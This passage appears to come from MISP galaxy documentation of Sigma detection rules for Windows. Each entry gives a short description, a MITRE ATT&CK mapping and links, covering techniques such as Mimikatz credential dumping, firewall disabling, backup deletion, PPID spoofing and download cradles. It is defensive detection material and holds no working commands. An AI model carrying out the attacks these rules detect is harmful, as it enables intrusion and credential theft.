
Tasks Folder Evasion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10554. Table References

Links

https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26

https://twitter.com/subTee/status/1216465628946563073

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml

Suspicious Ping/Copy Command Combination

Detects uncommon one-liner command having ping and copy at the same time, which is usually used by malware.

The tag is: misp-galaxy:sigma-rules="Suspicious Ping/Copy Command Combination"

Suspicious Ping/Copy Command Combination has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10555. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml

Suspicious Modification Of Scheduled Tasks

Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location Attackers can create a simple looking task in order to avoid detection on creation as it’s often the most focused on Instead they modify the task after creation to include their malicious payload

The tag is: misp-galaxy:sigma-rules="Suspicious Modification Of Scheduled Tasks"

Suspicious Modification Of Scheduled Tasks has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10556. Table References

Links

Internal Research[Internal Research]

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_change.yml

HackTool - PPID Spoofing SelectMyParent Tool Execution

Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent

The tag is: misp-galaxy:sigma-rules="HackTool - PPID Spoofing SelectMyParent Tool Execution"

HackTool - PPID Spoofing SelectMyParent Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004" with estimative-language:likelihood-probability="almost-certain"

Table 10557. Table References

Links

https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files

https://pentestlab.blog/2020/02/24/parent-pid-spoofing/

https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing

https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml

Firewall Disabled via Netsh.EXE

Detects netsh commands that turns off the Windows firewall

The tag is: misp-galaxy:sigma-rules="Firewall Disabled via Netsh.EXE"

Firewall Disabled via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10558. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall

https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/

https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml

Uncommon Child Process Of BgInfo.EXE

Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Of BgInfo.EXE"

Uncommon Child Process Of BgInfo.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10559. Table References

Links

https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml

Custom Class Execution via Xwizard

Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.

The tag is: misp-galaxy:sigma-rules="Custom Class Execution via Xwizard"

Custom Class Execution via Xwizard has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10560. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Xwizard/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml

Disable Important Scheduled Task

Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities

The tag is: misp-galaxy:sigma-rules="Disable Important Scheduled Task"

Disable Important Scheduled Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10561. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task

https://twitter.com/MichalKoczwara/status/1553634816016498688

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml

Directory Removal Via Rmdir

Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

The tag is: misp-galaxy:sigma-rules="Directory Removal Via Rmdir"

Directory Removal Via Rmdir has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10562. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml

Uncommon AddinUtil.EXE CommandLine Execution

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.

The tag is: misp-galaxy:sigma-rules="Uncommon AddinUtil.EXE CommandLine Execution"

Uncommon AddinUtil.EXE CommandLine Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10563. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml

Potential COM Objects Download Cradles Usage - Process Creation

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

The tag is: misp-galaxy:sigma-rules="Potential COM Objects Download Cradles Usage - Process Creation"

Potential COM Objects Download Cradles Usage - Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10564. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57

https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml

Scripting/CommandLine Process Spawned Regsvr32

Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.

The tag is: misp-galaxy:sigma-rules="Scripting/CommandLine Process Spawned Regsvr32"

Scripting/CommandLine Process Spawned Regsvr32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10566. Table References

Links

https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/

https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml

DLL Execution Via Register-cimprovider.exe

Detects using register-cimprovider.exe to execute arbitrary dll file.

The tag is: misp-galaxy:sigma-rules="DLL Execution Via Register-cimprovider.exe"

DLL Execution Via Register-cimprovider.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 10567. Table References

Links

https://twitter.com/PhilipTsukerman/status/992021361106268161

https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml

Uncommon Userinit Child Process

Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.

The tag is: misp-galaxy:sigma-rules="Uncommon Userinit Child Process"

Uncommon Userinit Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"

Table 10568. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core

https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml

SystemStateBackup Deleted Using Wbadmin.EXE

Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.

The tag is: misp-galaxy:sigma-rules="SystemStateBackup Deleted Using Wbadmin.EXE"

SystemStateBackup Deleted Using Wbadmin.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10570. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml

File Download Using ProtocolHandler.exe

Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)

The tag is: misp-galaxy:sigma-rules="File Download Using ProtocolHandler.exe"

File Download Using ProtocolHandler.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10571. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_download.yml

Uncommon One Time Only Scheduled Task At 00:00

Detects scheduled task creation events that include suspicious actions, and is run once at 00:00

The tag is: misp-galaxy:sigma-rules="Uncommon One Time Only Scheduled Task At 00:00"

Uncommon One Time Only Scheduled Task At 00:00 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10572. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml

Copying Sensitive Files with Credential Data

Files with well-known filenames (sensitive files with credential data) copying

The tag is: misp-galaxy:sigma-rules="Copying Sensitive Files with Credential Data"

Copying Sensitive Files with Credential Data has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10573. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/

https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml

Suspicious Driver Install by pnputil.exe

Detects when a possible suspicious driver is being installed via pnputil.exe lolbin

The tag is: misp-galaxy:sigma-rules="Suspicious Driver Install by pnputil.exe"

Suspicious Driver Install by pnputil.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 10574. Table References

Links

https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html

https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml

Use of UltraVNC Remote Access Software

An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks

The tag is: misp-galaxy:sigma-rules="Use of UltraVNC Remote Access Software"

Use of UltraVNC Remote Access Software has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10575. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml

Indirect Inline Command Execution Via Bash.EXE

Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash

The tag is: misp-galaxy:sigma-rules="Indirect Inline Command Execution Via Bash.EXE"

Indirect Inline Command Execution Via Bash.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10576. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Bash/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bash_command_execution.yml

Operator Bloopers Cobalt Strike Modules

Detects Cobalt Strike module/commands accidentally entered in CMD shell

The tag is: misp-galaxy:sigma-rules="Operator Bloopers Cobalt Strike Modules"

Operator Bloopers Cobalt Strike Modules has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10577. Table References

Links

https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml

Service Started/Stopped Via Wmic.EXE

Detects usage of wmic to start or stop a service

The tag is: misp-galaxy:sigma-rules="Service Started/Stopped Via Wmic.EXE"

Service Started/Stopped Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10578. Table References

Links

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service_manipulation.yml

Odbcconf.EXE Suspicious DLL Location

Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.

The tag is: misp-galaxy:sigma-rules="Odbcconf.EXE Suspicious DLL Location"

Odbcconf.EXE Suspicious DLL Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10579. Table References

Links

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/

https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml

Potentially Suspicious Windows App Activity

Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Windows App Activity"

Table 10580. Table References

Links

https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml

Mshtml.DLL RunHTMLApplication Suspicious Usage

Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http…​)

The tag is: misp-galaxy:sigma-rules="Mshtml.DLL RunHTMLApplication Suspicious Usage"

Table 10581. Table References

Links

http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt

https://twitter.com/n1nj4sec/status/1421190238081277959

https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI

Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"

The tag is: misp-galaxy:sigma-rules="Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI"

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10582. Table References

Links

https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/

https://twitter.com/pfiatde/status/1681977680688738305

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3

https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation

https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml

Visual Basic Command Line Compiler Usage

Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.

The tag is: misp-galaxy:sigma-rules="Visual Basic Command Line Compiler Usage"

Visual Basic Command Line Compiler Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 10583. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Vbc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml

Potential DLL File Download Via PowerShell Invoke-WebRequest

Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet

The tag is: misp-galaxy:sigma-rules="Potential DLL File Download Via PowerShell Invoke-WebRequest"

Potential DLL File Download Via PowerShell Invoke-WebRequest has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10584. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml

File Deletion Via Del

Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

The tag is: misp-galaxy:sigma-rules="File Deletion Via Del"

File Deletion Via Del has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10585. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_execution.yml

Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE

Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).

The tag is: misp-galaxy:sigma-rules="Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE"

Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 10586. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml

HackTool - Mimikatz Execution

Detection well-known mimikatz command line arguments

The tag is: misp-galaxy:sigma-rules="HackTool - Mimikatz Execution"

HackTool - Mimikatz Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 10588. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://tools.thehacker.recipes/mimikatz/modules

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml

HackTool - CoercedPotato Execution

Detects the use of CoercedPotato, a tool for privilege escalation

The tag is: misp-galaxy:sigma-rules="HackTool - CoercedPotato Execution"

HackTool - CoercedPotato Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10589. Table References

Links

https://github.com/hackvens/CoercedPotato

https://blog.hackvens.fr/articles/CoercedPotato.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_coercedpotato.yml

Potential PowerShell Downgrade Attack

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Downgrade Attack"

Potential PowerShell Downgrade Attack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10590. Table References

Links

http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/

https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml

Firewall Rule Deleted Via Netsh.EXE

Detects the removal of a port or application rule in the Windows Firewall configuration using netsh

The tag is: misp-galaxy:sigma-rules="Firewall Rule Deleted Via Netsh.EXE"

Firewall Rule Deleted Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10591. Table References

Links

https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete_rule.yml

Remote File Download Via Desktopimgdownldr Utility

Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.

The tag is: misp-galaxy:sigma-rules="Remote File Download Via Desktopimgdownldr Utility"

Remote File Download Via Desktopimgdownldr Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10592. Table References

Links

https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml

Suspicious Windows Update Agent Empty Cmdline

Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn’t contain any command line flags

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Update Agent Empty Cmdline"

Suspicious Windows Update Agent Empty Cmdline has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10593. Table References

Links

https://redcanary.com/blog/blackbyte-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml

Certificate Exported Via PowerShell

Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

The tag is: misp-galaxy:sigma-rules="Certificate Exported Via PowerShell"

Certificate Exported Via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10594. Table References

Links

https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a

https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml

Set Files as System Files Using Attrib.EXE

Detects the execution of "attrib" with the "+s" flag to mark files as system files

The tag is: misp-galaxy:sigma-rules="Set Files as System Files Using Attrib.EXE"

Set Files as System Files Using Attrib.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 10595. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib

https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml

Suspicious Service Path Modification

Detects service path modification via the "sc" binary to a suspicious command or path

The tag is: misp-galaxy:sigma-rules="Suspicious Service Path Modification"

Suspicious Service Path Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10596. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml

Cscript/Wscript Potentially Suspicious Child Process

Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.

The tag is: misp-galaxy:sigma-rules="Cscript/Wscript Potentially Suspicious Child Process"

Table 10597. Table References

Links

https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_22.12.2023.txt

Internal Research[Internal Research]

https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml

Regsvr32 DLL Execution With Suspicious File Extension

